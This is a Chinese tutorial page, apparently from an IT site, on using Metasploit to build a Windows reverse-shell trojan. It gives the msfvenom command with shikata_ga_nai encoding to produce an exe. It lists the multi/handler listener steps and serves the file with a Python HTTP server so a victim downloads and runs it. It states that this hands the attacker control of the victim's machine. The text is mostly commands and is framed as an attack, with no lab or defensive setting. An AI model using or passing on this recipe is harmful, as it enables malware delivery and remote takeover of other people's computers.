IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> 使用msf生成木马反弹shell(windows系统) -> 正文阅读

[系统运维]使用msf生成木马反弹shell(windows系统)

一、理论总结

使用msf进行木马攻击总共分为三步即可:

1、生成攻击木马

2、配置监控主机

3、上传木马使得靶机中招

1.1生成攻击木马

使用msf来生成木马是一个比较方便的事情,使用msfvenom即可,框架模版为:

msfvenom -p windows/meterpreter_reverse_tcp LHOST={监控IP} LPORT={监控端口} -e x86/shikata_ga_nai? -f exe -o? new.exe -i 5

具体的含义可以查阅该专栏下的另外一篇文章msfvenom基本介绍

1.2 配置监控主机

配置监控也是在msf中进行相关参数的配置即可。

1. 启动msf ? 终端内输入:msfconsole 启动msf

2. 载入监控模块? msf中输入: use exploit/multi/handler

3. 加载payload? msf终端中输入:set payload windows/meterpreter/reverse_tcp

4. 配置payload? msf终端中输入:show options

5. 配置payload监控IP msf终端中输入: set? lhost? {监控IP}

6. 配置payload监控端口? msf终端中输入:set lport? {监控端口} (注意这里要和木马配置时使用的端口相同&如果使用内网穿透服务填写转发后的端口)

7. 检查payload配置? msf终端中输入:show options?

8. 执行监控? msf终端中输入: run

1.3 上传木马

上传木马有多种方式,当受害者把你的木马从网上下载运行的时候你的攻击就成功了。

二、实战演练

首先生成需要攻击的机器对应的木马

模版:

msfvenom -p windows/meterpreter_reverse_tcp LHOST={监控IP} LPORT={监控端口} -e x86/shikata_ga_nai? -f exe -o? new.exe -i 5

监控ip即为攻击者本机的ip地址,可以选择使用ifconfig或者ip -a来查看。Lport如果你不进行更改它会默认放在4444端口进行监听。

指令输入后会有如下显示:

使用ls来查看目录发现存在相应文件 shell.exe:

在木马完成生成后需要做的是配置监控:

如上文的步骤

1、msfconsole

启动msf

?2、use exploit/multi/handler

? ? ? ?set payload windows/meterpreter/reverse_tcp

载入监控模块

监控的对象需要和我们上面生成的后门相一致:

?3、set? lhost? {监控IP}

? ? ? ?set?lport???{监控端口}

?到这一步即监听配置完成。

4、使用最新的python服务上传木马

python2 -m SimpleHTTPServer 8080
使用该指令快速搭建服务器,即可访问该文件将木马下载运行,即获得控制权。

这边在自己将本机搭建为服务器之后,在登陆该网址的时候记得得用http而不是https,否则会出现无法登陆的情况。

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2022-12-25 11:43:44  更:2022-12-25 11:44:04 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/28 3:22:37-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计